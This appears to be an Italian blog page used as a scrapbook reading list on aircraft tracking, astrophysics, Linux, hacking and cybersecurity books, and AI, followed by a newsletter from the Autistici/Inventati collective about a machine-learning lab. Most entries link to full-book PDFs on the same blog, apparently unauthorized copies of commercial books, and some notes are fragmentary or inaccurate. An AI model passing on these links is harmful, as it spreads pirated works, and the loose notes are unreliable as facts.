.
Astrofisica
_____________________________________________
Josh Wilson · Segui
Srpodnstoe
·
Come vengono tracciati gli aerei nell’aria 🛫📡
1️⃣ GPS:
Guida piloti e localizzazione.
2️⃣ Trasponder:
Invia segnali ai radar per il tracciamento.
3️⃣ Radar primario:
Fa rimbalzare le onde radio sull’aereo.
4️⃣ Radar secondario:
Comunica con i transponder per dati precisi.
5️⃣ ADS-B:
Trasmette posizione aerea via satellite.
6️⃣ Controllo del traffico aereo (ATC):
Monitora gli aerei utilizzando radar e collegamenti dati.
7️⃣ Scatola nera:
Registra i dati di volo e cabina di pilotaggio.
8️⃣ ACARS:
Invia manutenzione e aggiornamenti meteo ai piloti.
Microsoft Flight Simulator 2020 (Asobo Studio)
https://www.facebook.com/groups/101987210144851/
https://www.wired.it/article/matematica-infinito-piu-grande-nuova-classe-scoperta/
Antartide, beni culturali e intelligenza artificiale
https://it.quora.com/La-ISS-Stazione-Spaziale-Internazionale-utilizza-Linux-o-Microsoft-Windows-per-i-suoi-computer
c a p i t a l i s m o s t e l l a r e
[c]
https://web.uniroma1.it/trasparenza/sites/default/files/cv/CV%20SENZA%20DATI%20SENSIBILI%20Marcello%20Spagnulo_0.pdf
La nascita del Capitalismo Stellare. Intervista a Marcello Spagnulo, parte 1. Cosm8lina, ep. 3
OttolinaTV
https://maria2021.noblogs.org/files/2024/11/Capitalismo-stellare-Capitalismo-stellare.-Come-la-nuova-corsa-1-1.pdf
https://lists.autistici.org/message/20241205.142726.87feab7a.en.html
[1 c]
https://www.lesjohnsonauthor.com/
https://www.imdb.com/it/name/nm5707287/?ref_=vp_close
https://www.apogeonline.com/libri/in-viaggio-tra-le-stelle-les-johnson/
https://www.linkedin.com/in/lesjohnson1/
https://x.com/lesauthor
Immagine del profilo di esquireitalia
✏️ Les Johnson
Qual è il vero senso della ricerca sulle missioni interstellari?
Vivere su Marte o usare la scienza per scopi infinitamente più
terrestri? Les Johnson, tecnologo della NASA e autore di In viaggio
tra le stelle, invita a una cavalcata nel sistema planetario. Con
un’avvertenza: non è un’impresa per menti deboli.
https://www.instagram.com/esquireitalia/p/C55n52rN_ZE/
Leggi l’articolo sul nuovo numero di Esquire, aprile 2024.
Esquire Italia, nella sua versione print, vuole essere l’opposto: una rampa
di lancio. Pagine di carta nelle quali trovare il propellente per prendere quota,
per alzare lo sguardo. Per tornare a immaginare la velocità adatta per nuove
conquiste. Come abbiamo fatto noi con il libro In viaggio tra le stelle di
Les Johnson (grazie edizioni Apogeo) e le foto di Vincent Fournier.
https://www.esquire.com/it/news/attualita/a60472215/esquire-italia-32-editoriale/
https://maria2021.noblogs.org/files/2024/11/In-viaggio-tra-le-stelle-Les-Johnson.pdf
[2 c]
https://maria2021.noblogs.org/files/2024/11/Ai-confini-della-realta-Anil-Ananthaswamy.pdf
i n f o r m a t i c a [ 1 ]
[1 a]
https://brysonpayne.com/
https://www.hoeplieditore.it/hoepli-catalogo/articolo/hacking-attacco-e-difesa-bryson-payne/9788836011339/2840
https://maria2021.noblogs.org/files/2024/11/Hacking.-Attacco-e-difesa-Bryson-Payne.pdf
[2 a]
https://it.wikipedia.org/wiki/David_Patterson
assembly
Written well, feels gentle
The book gradually increases the complexity at a rate that is comfortable. It is written well and even when
I’m skipping around out of boredom, any passage I read makes sense. I have no complaints. Just keep in mind
that it’s not a book that gives you Verilog or VHDL code examples. The lowest level of programming it covers
is mainly MIPS assembly. I’m totally fine with that honestly. This book was recommended by the professor of
the class I was taking and it has a lot of good diagrams and MIPS assembly demonstration code
and is a great aid to the lecture material…
https://maria2021.noblogs.org/files/2023/04/La-Sicurezza-Informatica.-Tra-informatica-Francesca-Cirini.pdf
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
P r o g a m m a z i o n e
[3 a]
https://learning.lpi.org/pdfstore/LPI-Learning-Material-010-160-it.pdf
https://bookshop.editrice-esculapio.com/products/pelagatti-sistema-operativo-linux
https://www.polimi.it/fileadmin/user_upload/Lavora-con-noi/allegati_ricercatori_determinato/1455093509_RelazionefinaleDEIB20.pdf
https://www.deib.polimi.it/ita/personale/details/520488
https://github.com/algra/awesome-free-programming-books/blob/main/books/free-programming-books-it.md
https://maria2021.noblogs.org/files/2024/11/Pelagatti-Giuseppe-Sistema-Operativo-Linux-Esculapio-S.E._-Progetto-Leonardo-2009.pdf
[4 a]
https://www.ubiklibri.it/book-9788874883349-costruire-sistemi-software-dai-modelli-al-codice.html
https://www.unibo.it/sitoweb/ambra.molesini/cv
http://lia.deis.unibo.it/Staff/AmbraMolesini/
https://www.alice.unibo.it/xwiki/bin/view/AmbraMolesini/Publications/Services/PerYear
https://maria2021.noblogs.org/files/2024/11/Costruire-sistemi-software-Dai-modelli-al-codice-Ambra-Molesini-Antonio-Natali-2edizione-Esculapio.pdf
[5 a]
https://www.linkedin.com/in/paulolushile/?originalSubdomain=ng
https://www.apogeonline.com/libri/linux-riga-di-comando-paul-olushile/
https://github.com/pslucas0212/PaulsTutorials
https://maria2021.noblogs.org/files/2024/11/Linux-Riga-di-Comando-Paul-Olushile.pdf
……………………………………………………………..
[6 a]
https://maria2021.noblogs.org/files/2024/11/linuxperprincipiantiisaacjcamus.pdf
[7 a]
https://www.hoeplieditore.it/hoepli-catalogo/articolo/basi-di-linux-per-hacker-occupytheweb/9788836006410/2610
OccupyTheWeb (OTW) è lo pseudonimo del fondatore e autore principale del sito web dedicato a hacker e pentester
www.hackers-arise.com. È stato professore in un college e ha oltre vent’anni di esperienza nel campo dell’informatica.
Ha formato hacker in tutti gli Stati Uniti, compresi alcuni settori militari (Esercito, Aeronautica e Marina),
nonché la community dell’intelligence statunitense (CIA, NSA e DNI). È un appassionato di mountain bike e snowboard.
https://www.hoeplieditore.it/hoepli-catalogo/articolo/basi-di-linux-per-hacker-occupytheweb/9788836006410/2610
https://maria2021.noblogs.org/files/2024/11/Basi-di-Linux-per-hacker-Italian-Edition-Theweb-Occupy.pdf
[8 a]
vi si chiude con :q
https://api.pageplace.de/preview/DT0400.9780134853765_A35114215/preview-9780134853765_A35114215.pdf
https://maria2021.noblogs.org/files/2024/11/Linux-Essentials-for-Cybersecurity-2019-Pearson.pdf
******************
M a n u a l e i n f o r m a t i c a d a t i
[u]
https://www.cittastudi.it/catalogo/scienze/algoritmi-e-strutture-di-dati-1802/risorse-web/risorse-web-studenti-27
https://maria2021.noblogs.org/files/2024/11/INFORMATICA-Bertossi-A-AlgoritmiEStruttureDiDati-UTET.pdf
[——a]
i n f o r m a t i c a f o r e n s e
https://maria2021.noblogs.org/files/2024/11/Manuale-di-base-di-sicurezza-informatica-f-Andres-Canete.pdf
[—a]
https://en.wikipedia.org/wiki/Mark_Brake
https://www.apogeonline.com/libri/la-scienza-di-star-wars-jon-chase-mark-brake/
https://maria2021.noblogs.org/files/2024/11/La-scienza-di-Star-Wars-Jon-Chase-Mark-Brake.pdf
L i n u x e m e n t e h a c k e r
[–e]
Cliente Amazon
La nostra vita è governata dagli algoritmi… Niente di nuovo verrebbe da dire, ma forse non ci rendiamo
conto in quanti e quali modi incidono sulla nostra visione del mondo e sul dare forma ai nostri gusti.
L’autore fa un’analisi acuta e cita un sacco di casi in cui ci si può facilmente ritrovare (gli arredi
standardizzati dei bnb!) senza scadere nel luddismo o nella demonizzazione gratuita della tecnologia.
Forse un po’ di consapevolezza ci può aiutare a non farci schiacciare dal feroce algoritmo!
https://www.kylechayka.com/filterworld
https://www.instagram.com/kchayka/
Kyle Chayka -”Filterworld” & Experiencing the World Through Algorithms | The Daily Show
The Daily Show
https://maria2021.noblogs.org/files/2024/11/Filterworld-Filterworld-Come-Gli-Algoritmi-Hanno-Appia.pdf
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
…………………………………………………………………………….
[—d]
Herr Meier’ – Hacking di un computer (2024)
https://www.lafeltrinelli.it/hacking-di-computer-ebook-herr-meier/e/9798230162810
https://maria2021.noblogs.org/files/2024/11/Hackingdiuncomputer-HerrMeier.pdf
[-d]
[kernel]
https://maria2021.noblogs.org/files/2024/11/Linux-Kernel-Programming-Kaiwan-N.-Billimoria.pdf
[-e]
https://www.apogeonline.com/libri/larte-della-guerra-informatica-jon-dimaggio/?
books
https://github.com/lasq88/LearingMaterials/blob/main/cyber-threat-intelligence.md
https://github.com/paulveillard/cybersecurity-application-security/blob/main/BOOKS.md
I am Jon DiMaggio, professional "bad guy hunter" and author of The Art of Cyberwarfare from No Starch Press. AMA/ Ask me anything!
byu/NoStarchPress inhacking
https://www.youtube.com/@davidbombal
https://x.com/jon__dimaggio%20
https://www.apogeonline.com/articoli/wireshark-e-framework-di-ricognizione-jon-dimaggio/?srsltid=AfmBOoqgiNeYyBL5FQKWIWJvtiG97h4jsO6Kx5CYt1YKr6JCjRIPevGA
https://maria2021.noblogs.org/files/2024/11/lartedellaguerrainformatica-jondimaggio.pdf
[–a]
https://www.linkedin.com/in/carloalberto-sartor-657a647/
https://maria2021.noblogs.org/files/2024/11/Conosco-La-Tua-Password-Carloalberto-Sartor.pdf
[a]
https://it.wikipedia.org/wiki/Bruce_Schneier
https://www.schneier.com/
https://luissuniversitypress.it/pubblicazioni/la-mente-dello-hacker-trovare-la-falla-per-migliorare-il-sistema-luiss-university-press/
https://maria2021.noblogs.org/files/2024/11/mentehacker-BruceSchneier.pdf
[-h]
https://www.apogeonline.com/libri/ethical-hacking-daniel-g-graham/
https://github.com/The-Ethical-Hacking-Book/
https://maria2021.noblogs.org/files/2024/11/Ethical-Hacking-Daniel-G.-Graham.pdf
i n f o r m a t i c a [2]
.
[—b]
https://phd.uniroma1.it/web/Paola-CASTELLUCCI_nC746_IT.aspx
Profili di donne – 20 Marzo 2024 – Paola Castellucci
UNIFI – Convegni
https://en.wikipedia.org/wiki/George_Landow_(professor)
https://maria2021.noblogs.org/files/2024/11/dallipertestoalweb-paolacastellucci.pdf
[c]
https://www.bookrepublic.it/ebook/9788838690426-teoria-della-computabilita-e-della-complessita-mcgraw-hill-education-italy/
https://maria2021.noblogs.org/files/2024/11/Teoria-della-computabilita-e-della-complessita-McGraw-Hill-Education.pdf
[–c]
https://www.apogeonline.com/libri/c-guida-alla-programmazione-pellegrino-principe/
https://www.apogeonline.com/contrib/uploads/3328_fileEsempio.zip
https://maria2021.noblogs.org/files/2024/11/C-Guida-alla-Programmazione-PellegrinoPrincipe-.pdf
[d]
https://it.wikipedia.org/wiki/Hannah_Fry
sottotitolo traduzione automatica italiana
The Race to Harness Quantum Computing's Mind-Bending Power | The Future With Hannah Fry
Bloomberg Originals
https://www.bollatiboringhieri.it/libri/hannah-fry-hello-world-9788833932118/
https://maria2021.noblogs.org/files/2024/11/Hello-World-Hannah-Fry.pdf
[f]
pag. 30
A simple web search will
provide a list. This book uses Code::Blocks (www.codeblocks.org).
https://ptgmedia.pearsoncmg.com/images/9780789751980/samplepages/9780789751980.pdf
Greg Perry owns and manages RightNerve.com, the most popular set of writings in the history of the universe.
https://maria2021.noblogs.org/files/2024/11/CProgrammingAbsolute-BeginnersGuide-.pdf
[g]
https://nostarch.com/writing-c-compiler
https://norasandler.com/book/
https://maria2021.noblogs.org/files/2024/11/Nora_Sandler_Writing_a_C_Compiler_Build_a_Real_Programming_Language.pdf
[h]
https://maria2021.noblogs.org/files/2024/11/C-e-C.-Le-chiavi-della-programmazione-2016-Carlo-A.-Mazzone.pdf
•
La nuova direttiva NIS per un più alto livello di cybersicurezza del sistema Paese
Agenzia per la cybersicurezza nazionale
i n t e l l i g e n z a a r t i f i c i a l e
m u s i c a e c a p i t a l i s m o d e i d a t i
università di salerno: the sound of AI
real fb 8 11 2024
https://www.salernotoday.it/tag/universita-salerno/
https://web.unisa.it/didattica/internazionalizzazione-didattica/insegnamenti-in-inglese?id=518959&anno=2024&struttura=DIEM_
https://web.unisa.it/en/teaching/international-teaching/courses-on-offer?id=518959&anno=2024&struttura=DIEM_
https://unisa.coursecatalogue.cineca.it/insegnamenti/2024/516097/2022/10005/500191?coorte=2023&schemaid=17102
https://unisa.coursecatalogue.cineca.it/insegnamenti/2024/516099/2022/10005/500191?coorte=2023&schemaid=17102
https://www.youtube.com/@Infraction
https://www.instagram.com/infractionnocopyrightmusic/
*****
6 dicembre 2024 università di salerno av
[—–b]
https://it.wikipedia.org/wiki/National_Bibliography_Number
Cliente Amazon
La nostra vita è governata dagli algoritmi… Niente di nuovo verrebbe da dire, ma forse non ci rendiamo
conto in quanti e quali modi incidono sulla nostra visione del mondo e sul dare forma ai nostri gusti.
L’autore fa un’analisi acuta e cita un sacco di casi in cui ci si può facilmente ritrovare (gli arredi
standardizzati dei bnb!) senza scadere nel luddismo o nella demonizzazione gratuita della tecnologia.
Forse un po’ di consapevolezza ci può aiutare a non farci schiacciare dal feroce algoritmo!
https://www.kylechayka.com/filterworld
https://www.instagram.com/kchayka/
Kyle Chayka -”Filterworld” & Experiencing the World Through Algorithms | The Daily Show
The Daily Show
https://maria2021.noblogs.org/files/2024/11/Filterworld-Filterworld-Come-Gli-Algoritmi-Hanno-Appia.pdf
[–i]
https://maria2021.noblogs.org/files/2024/11/MusicAI-haicapitolintelligenzaartific-.pdf
…
[1 c]
LOGICA E INTELLIGENZA ARTIFICIALE 1 Marcello Fixione università di salerno
https://librerie.unicatt.it/libri-autore/marcello-frixione.html
https://librerie.unicatt.it/scheda-libro/marcello-frixione/logica-significato-e-intelligenza-artificiale-9788820487133-590502.html
https://maria2021.noblogs.org/files/2024/11/Ita-Logica-E-Intelligenza-Artificiale.pdf
[2 c]
https://www.utetuniversita.it/catalogo/scienze/programmazione-logica-e-prolog-1824
https://lia.disi.unibo.it/books/libro_pl/
Linguaggi per l’Intelligenza Artificiale
http://www.diag.uniroma1.it/~nardi/Didattica/RC/dispense/dispensa-linguaggiIA.pdf
https://lia.disi.unibo.it/books/libro_pl/
*****
lucidi slides Fondamenti di Intelligenza Artificiale M A.A. 2016-2017
http://lia.deis.unibo.it/Courses/AI/fundamentalsAI2016-17/Lucidi.html
https://drive.google.com/file/d/1wst11wquLDTv_VKBrvH9V9xrAgDt37nJ/view?usp=sharing
[3 c]
………………………………..
logica antica e moderna
https://www.mimesisedizioni.it/libro/9788857576879
https://maria2021.noblogs.org/files/2024/11/Logica-ed-etica-nel-pensiero-antico-Aldo-Brancacci.pdf
**************************************
logica matematica informatica utet
http://wwwusers.di.uniroma1.it/~logica/E-O/testi.html
https://www.studentville.it/libreremo-libri-universitari-gratis/
https://www.instagram.com/collettivo_ateneo_firenze/p/C3yKhPTrshb/
https://www.di.uniroma1.it/it/docenti/bio_labella
https://maria2021.noblogs.org/files/2024/11/libreremo-MordechaiBenAri-logicamatematicaperlinformatica.pdf
https://maria2021.noblogs.org/files/2024/11/Asperti-Ciabattoni-Logica-a-informatica.pdf
elementi di logica
https://maria2021.noblogs.org/files/2024/11/elementi-di-logica-23-12–300×187.png
https://maria2021.noblogs.org/files/2024/11/Wikipedia-Elementi-di-logica.pdf
dall" inferenza logica ai ragionamenti simbolici piu complessi
https://it.wikipedia.org/wiki/Logica
https://it.wikipedia.org/wiki/Logica_dinamica
In che modo la programmazione logica si differenzia dai paradigmi di programmazione tradizionali?
https://www.lenovo.com/it/it/glossary/logic-programming/
https://www.pensierocritico.eu/logica–cosa-sono-le-inferenze.html
https://it.wikipedia.org/wiki/Argomentazione
https://www.ibm.com/think/topics/chain-of-thoughts
https://it.wikipedia.org/wiki/Intelligenza_artificiale_simbolica
*****
catene di pensieri
Le Voci dell’AI – Episodio 73: Chain-of-Thoughts: insegnare alle macchine l’inferenza logica
I n t e l l i g e n z a a r t i f i c i a l e
:::::::::::::::::::::::::::::::::::::::::::::::::::
https://www.egeaeditore.it/ita/prodotti/cultura-scientifica/comunicazione-artificiale.aspx
“alle implicazioni del «diritto all’oblio»; per approdare infine alle fotografie,
utilizzate oggi più per sfuggire al presente che per conservare una memoria per il futuro.”
quaderni di sociologia
https://journals.openedition.org/qds/5154
Bergamo città impresa
“i progammatori dicono” 19:00 “test di turing” 23:00
30:30 “s”è scoperto il byte ma ormai il progammatore
l”ha scoperto prima”
COME GLI ALGORITMI PRODUCONO INTELLIGENZA SOCIALE
ItalyPost
https://www.unibo.it/sitoweb/elena.esposito9/cv
https://www.classagora.it/speakers/elena-esposito-2362
https://www.ilbollettino.eu/2024/04/15/esposito-unibo-ai-luomo-resta-al-centro-ma-e-necessario-un-reskilling/
sullo statuto di finzione della realtà contemporanea e sul ruolo
delle aspettative e della temporalità nell’economia finanziaria.
Negli ultimi tempi si sta occupando anche della questione degli
algoritmi predittivi. È in corso di stampa per MIT Press il suo ultimo
volume: Artificial Communication: How Algorithms Produce Social Intelligence.
https://maria2021.noblogs.org/files/2024/11/Comunicazione-artificiale-Elena-Esposito.pdf
https://it.wikipedia.org/wiki/La_singolarit%C3%A0_%C3%A8_vicina
https://www.wired.it/article/ray-kurzweil-libro-la-singolarita-e-piu-vicina-temi-recensione/
https://www.cmple.com/learn/ray-kurzweils-most-notable-predictions-hits-and-misses
Ray Kurzweil svela il futuro: ora la Singolarità è ancora più vicina
Incontro 58 – La singolarità è più vicina
SingularityU Milan
https://www.apogeonline.com/libri/la-singolarita-e-piu-vicina-ray-kurzweil/
https://it.wikipedia.org/wiki/Raymond_Kurzweil
“migliorare l”età biologica”
https://www.fanpage.it/innovazione/tecnologia/la-storia-di-ray-luomo-che-ha-deciso-di-fondersi-con-unintelligenza-artificiale/
https://maria2021.noblogs.org/files/2024/11/La-singolarita-e-piu-vicina-Ray-Kurzweil.pdf
s c u o l a
L’Intelligenza Artificiale
per lo Sviluppo Sostenibile
AI lo stato dell”arte
https://www.cnr.it/sites/default/files/public/media/attivita/editoria/VOLUME%20FULL%2014%20digital%20LIGHT.pdf
[—f]
https://it.wikipedia.org/wiki/Carocci_Editore
Ranieri-Cuomo-Biagini, Scuola e Intelligenza Artificiale. Percorsi di alfabetizzazione critica
https://cercachi.unifi.it/p-doc2-2015-0-A-2c2a342f332d-0.html
https://maria2021.noblogs.org/files/2024/11/Stefano-Cuomo-Maria-Ranieri-Gabriele-Biagini-Scuola-e-Intelligenza-Artificiale.-Percorsi-di-alfabetizzazione-critica-Carocci.pdf
[–i]
Ai con modello matematico python
Machine Learning con Python di Raschka
https://www.hoeplieditore.it/hoepli-catalogo/articolo/algoritmi-per-lintelligenza-artificiale-roberto-marmo/9788836017270/3094
https://www.robertomarmo.net/
https://maria2021.noblogs.org/files/2024/11/algoritmiperlintelligenzaartificiale-RobertoMarmo-.pdf
https://www.apogeonline.com/libri/machine-learning-con-python-nuova-edizione-sebastian-raschka-vahid-mirjalili/
https://maria2021.noblogs.org/files/2024/11/Machine-Learning-con-Python_-costruire-alg-Sebastian-Raschka.pdf
……………………………………………………………
A s t r o f i s i c a e A I
Antartide, beni culturali e intelligenza artificiale
c a p i t a l i s m o s t e l l a r e
[c]
https://web.uniroma1.it/trasparenza/sites/default/files/cv/CV%20SENZA%20DATI%20SENSIBILI%20Marcello%20Spagnulo_0.pdf
La nascita del Capitalismo Stellare. Intervista a Marcello Spagnulo, parte 1. Cosm8lina, ep. 3
OttolinaTV
https://maria2021.noblogs.org/files/2024/11/Capitalismo-stellare-Capitalismo-stellare.-Come-la-nuova-corsa-1-1.pdf
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
*********************************************************
https://it.wikipedia.org/wiki/Frankenstein_o_il_moderno_Prometeo
Le minacce dell’intelligenza artificiale
AI e medicina sanità chirurgia
[—–e]
intelligenza artificiale e medicina (e chirurgia)
https://www.linkedin.com/posts/angelo-guglielmotti-03847a90_ai-excel-licensing-activity-7255513031764271104-BD7J/?originalSubdomain=it
https://www.linkedin.com/posts/rossella-arcomano-healthcarespecialist_ia-in-sanit%C3%A0-nuove-frontiere-nuove-responsabilit%C3%A0-activity-7255222696706277376-69YG/?originalSubdomain=it
scarica con email aziendale il libro
1
2
Neurotecnologie e privacy: i passi avanti verso un futuro etico e regolamentato
https://books.mondadoristore.it/buy-ebook-online/Enrico-Guardelli/aut05253033/
https://maria2021.noblogs.org/files/2024/11/INTELLIGENZA-ARTIFICIALE-E-MEDICINA-La-Pro-Enrico-Guardelli.pdf
[e 2]
https://www.mondadoristore.it/Intelligenza-artificiale-Ciro-Galiano-Raffaele-La-Russa-Valerio-Renzelli/eai979125541072/
https://www.corsi-ecm-fad.it/catalogo-corsi/pdf/manageriale_corso-ecm-intelligenza-artificiale-in-sanita-principi-base-e-aspetti-legali_2480
https://maria2021.noblogs.org/files/2024/11/Intelligenza-artificiale-in-sanita-Valerio-Renzelli-Ciro-Galiano-Raffaele-L.pdf
d i r i t t o e i n t e l l i g e n z a a r t i f i c i a l e
[e 3]
https://maria2021.noblogs.org/files/2024/11/Diritto-e-intelligenza-artificiale-Guido-Alpa.pdf
[—f]
https://maria2021.noblogs.org/files/2024/11/INTELLIGENZA-ARTIFICIALE-E-BOOK-Eugenio-Zuccarelli-Gabriele-Di-Matteo.pdf
I B M
********************************************
[1 g]
https://it.wikipedia.org/wiki/Francesca_Rossi_(scienziata)
https://www.linkedin.com/in/francesca-rossi-34b8b95/
https://www.ibm.com/think/author/francesca-rossi
COME FUNZIONA L'AI, SPIEGATO BENE 🤖 Francesca Rossi (IBM) a Grande Giove
Grande Giove
https://maria2021.noblogs.org/files/2024/11/Francesca-Rossi-Intelligenza-artificiale.-Come-funziona-e-dove-ci-porta-Laterza-2024-10.pdf
************
[2 g ]
https://it.wikipedia.org/wiki/Andrea_Colamedici
Tlon – Andrea Colamedici e Maura Gancitano, la moda e l’idea di normalità
Palazzo Ducale
Pensare (con) l”Intelligenza Artificiale Generativa
Prompt Thinking per la Didattica Universitaria | Colamedici | Ciclo incontri IA | TLC-UniTo
Teaching and Learning Center UniTo
Iscritto
https://maria2021.noblogs.org/files/2024/11/LalgoritmodiBabele-AndreaColamediciSimoneArcagni.pdf
filosofia e AI
[—h]
etica e intelligenza artificiale
https://maria2021.noblogs.org/files/2024/11/lalgoritmodellavita-VincenzoPaglia.pdf
[—-h]
https://it.wikipedia.org/wiki/Remo_Bodei
https://www.mulino.it/isbn/9788815383167
https://maria2021.noblogs.org/files/2024/11/Biblioteca-paperbacks-Remo-Bodei-Dominio-e-sottomissione.-Schiavi-animali-macchine-Intelligenza-Artificiale-Il-Mulino-2024.pdf
[e 4]
https://presidenza.governo.it/amministrazionetrasparente/personale/curriculum/dettaglio.asp?d=23703&queryInServizio=nocessa
https://www.feltrinellieditore.it/autori/aresualessandro/
https://x.com/alearesu?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor
"linus torvalds 90% marketing"
"Geopolitica dell'intelligenza artificiale" di Alessandro Aresu
Letture
https://maria2021.noblogs.org/files/2024/11/geopoliticadellintelligenzaartificiale-Alessandro-Aresu.pdf
[—–d]
https://www.utetlibri.it/libri/cosa-sognano-le-ia/
https://www.instagram.com/pietrominto/
https://www.linkedin.com/posts/alessandronoto_ho-da-poco-finito-di-leggere-cosa-sognano-activity-7257278952027672577-bKma/?originalSubdomain=it
https://linkmoltobelli.substack.com/
L'UOMO CON TUTTE LE RISPOSTE! SALVATORE ARANZULLA passa dal BSMT!
The BSMT by Gianluca Gazzoli
VIDENS con Pietro Minto, Ep. 13
Brief
COSA SOGNANO LE IA? LO SCOPRIREMO IL 18 DICEMBRE ALL’APERINNOVATIVO CON PIETRO MINTO
https://www.linkedin.com/posts/vincenzolomonaco_le-voci-dellai-episodio-73-chain-of-thoughts-activity-7257770842191785985-7Mzt/
vincenzo lomonaco università di Pisa
Le Voci dell’AI – Episodio 73: Chain-of-Thoughts: insegnare alle macchine l’inferenza logica
https://maria2021.noblogs.org/files/2024/11/Cosa-sognano-le-IA-Pietro-Minto.pdf
[–d]
intelligenza artificiale
https://docenti.unimc.it/emanuele.frontoni
https://x.com/efrontoni
https://www.linkedin.com/in/emanuelefrontoni/
https://github.com/emanuelefrontoni
AI
https://it.wikipedia.org/wiki/Cambriano
Si basa su prove paleontologiche, embriologiche di comparazione anatomica e di caratteristiche biochimiche degli organismi.
https://it.wikipedia.org/wiki/Evoluzione_della_vita
PREFAZIONE
di Fei-Fei Li
L’avvento dell’intelligenza artificiale segna un momento cruciale nella
storia umana, paragonabile all’evoluzione della vista nelle prime forme di
vita. Proprio come lo sviluppo della capacità di vedere portò a
un’esplosione di biodiversità e intelligenza durante il periodo Cambriano,
così l’AI sta inaugurando una nuova era di progresso tecnologico e di nuove
forme di conoscenza.
Il viaggio dell’AI è iniziato con semplici compiti di riconoscimento delle
immagini, ma è rapidamente progredito verso un’abilità visiva complessa,
l’elaborazione del linguaggio naturale e lo sviluppo di capacità generative.
Questa evoluzione è stata resa possibile dalla convergenza di tre potenti
forze: le reti neurali, l’hardware specializzato, come le GPU, e i grandi set di
dati, come ImageNet. L’AI di oggi non solo può identificare oggetti nelle
immagini, ma può creare contenuti visivi completamente nuovi partendo da
descrizioni testuali. Questo salto dalla percezione alla creazione rispecchia
il percorso evolutivo dalla ricezione passiva della luce alla comprensione
attiva e all’interazione con l’ambiente.
https://maria2021.noblogs.org/files/2024/11/aiultima-frontiera-EmanueleFrontoni.pdf
[—-d]
https://www.apogeonline.com/libri/intelligenza-artificiale-in-pratica-valentina-alto/
https://www.apogeonline.com/contrib/uploads/Intelligenza-artificiale-in-pratica-file-degli-esempi.zip
https://github.com/valentina-alto
40:40 neuroni "i parametri"
Sogni a portata di prompt – l'era dell'AI generativa | Valentina Alto | TEDxComacchio
TEDx Talks
https://www.joinrs.com/it/valentina-alto-microsoft-data-science/
https://www.linkedin.com/in/valentina-alto-6a0590148/
Have you already tried AIShell?
https://www.linkedin.com/feed/update/urn:li:activity:7274801426306859008/
https://maria2021.noblogs.org/files/2024/11/Intelligenza-Artificiale-in-pratica-Valentina-Alto.pdf
https://filo.unibo.it/it/con-societa-e-impresa/divulgazione-scientifica/daniel-andler-sorbonne-universite-francesco-bianchini-unibo-valeria-zotti-unibo-ia-ad-augusta-per-angusta-il-percorso-dell-ia-tra-abbandoni-e-successi
https://www.institutfrancais.it/milano/ai-intelligence-and-cognition#/
https://www.facebook.com/IFItalia/photos/-daniel-andler-in-italia-la-resistibile-ascesa-dellintelligenza-artificiale-con-/603451062247467/?_rdr
https://www.instagram.com/spaziosette_libreria/
https://www.editorialedomani.it/idee/cultura/la-sfida-del-filosofo-andler-non-lasciamoci-rincretinire-dallintelligenza-artificiale-ud6s67ht
https://andler.ens.psl.eu/en/home-page/
https://maria2021.noblogs.org/files/2024/11/Il-duplice-enigma-Daniel-Andler.pdf
:
****************************************************************************************************
Dicembre 2024
AI e dati senza fare capitalismo:
# Novita'
Abbiamo aperto l'Unita' Linguaggi Artificiali (ULA),
https://ula.inventati.org/
una unita' di ricerca ed esplorazione dedicata al campo del machine learning.
Perche' ULA?
L'uso del Machine Learning con obiettivi non imprenditoriali o istituzionali
ha iniziato a stuzzicare dall'anno scorso i nostri immaginari politici di
archiviazione, mediazione, programmazione…
Abbiamo infatti finalmente a portata di mano la possibilita' di facilitare la
classificazione, la gestione e l'analisi di informazioni in modo molto
efficiente, arricchendola anche con altre esperienze e punti di vista anche
alternativi ai nostri (o puramente plausibili ma di fantasia), mantenendo
pero' il nostro scopo di coltivare la rivolta, la mediazione tra diverse forme
di dialogo radicale e spingere piu' futuri possibili per tutte le specie.
Rimaniamo consapevoli del fatto che il modello di dati esistente e' pieno di
pregiudizi, motivo per cui la risorsa non e' pensata per essere "interrogata"
come se si trattasse di un oracolo. Permette pero di identificare rapidamente
possibili analogie e collegamenti applicando i principi della statistica su
grosse moli di dati. Sappiamo che queste tecnologie verranno usate dal
capitalismo per opprimere maggiormente, ma vogliamo proporvi una visione
differente.
La cultura antagonista che ci caratterizza richiede un grosso impegno
quotidiano per resistere le logiche del capitale. Non sempre abbiamo tempo e
risorse sufficienti per poter anche immaginare nei dettagli e delineare
precisamente possibili percorsi politico-sociali piu' umani e meno autoritari
verso un mondo finalmente libero da quelle logiche. Gli esempi potrebbero
essere tanti, ne riusciamo a immaginare qualcuno?
Come pensiamo di rovesciare la cultura del debito? Come invece vorremmo
distribuire il reddito? Come vorremmo ribilanciare situazioni di
post-colonialismo, o di proprieta' privata? Oppure: in un mondo in cui la
cultura del debito e' presente, a quale cifra questo debito ammonta per quanto
riguarda invece il dovuto rimborso per sfruttamento ed abusi? O anche: in
quanti modi possiamo declinare secoli di patriarcato a partire da differenti
presupposti geografici, storici e culturali?
Ecco abbiam messo insieme alcuni chip con cui giocare. Inferite gente!
Se il consumo energetico delle ore di calcolo vi preoccupa, sappiate che il
nostro laboratorio consuma come un PC/console da gioco di ultima generazione.
Se avete una idea da provare, leggetevi la paginetta linkata sopra e
scriveteci a:
ula-proposals at inventati.org
Qualunque esperimento prodotto non e' pensato per essere messo a disposizione
del pubblico come un servizio ed usato online.
ULA al momento e' un laboratorio condiviso per sperimentare, per chi
l'hardware non ce l'ha.
Cogliamo anche l'occasione per dirvi che vogliamo proseguire ed estendere il
lavoro cominciato l'anno scorso con topics.noblogs.org, nella speranza che
questa pagina semplifichi la scoperta reciproca di gruppi radicali che operano
internazionalmente sugli stessi argomenti, pur non condividendo la stessa
lingua. Quindi se avete belle storie a riguardo, mandateci due righe!
# Dona!
E infine, se hai letto fin qui, sai che ogni anno ricordiamo a chi usa i
nostri servizi di farci una donazione per pagare le spese legali, la banda
internet, i domini, il datacenter ed l'hardware, ancora una volta alla faccia
di chi non crede possibile che il mutuo aiuto sia un modello fattibile.
Restiamo umani
GRAZIE MILLE DI CUORE! Buon 2025!
un abbraccio
A/I
+++++++++++++++++++++++++++++++++++++++++++
Collettivo Autistici/Inventati
https://www.autistici.org
blog: https://cavallette.noblogs.org
donazioni: https://www.autistici.org/donate
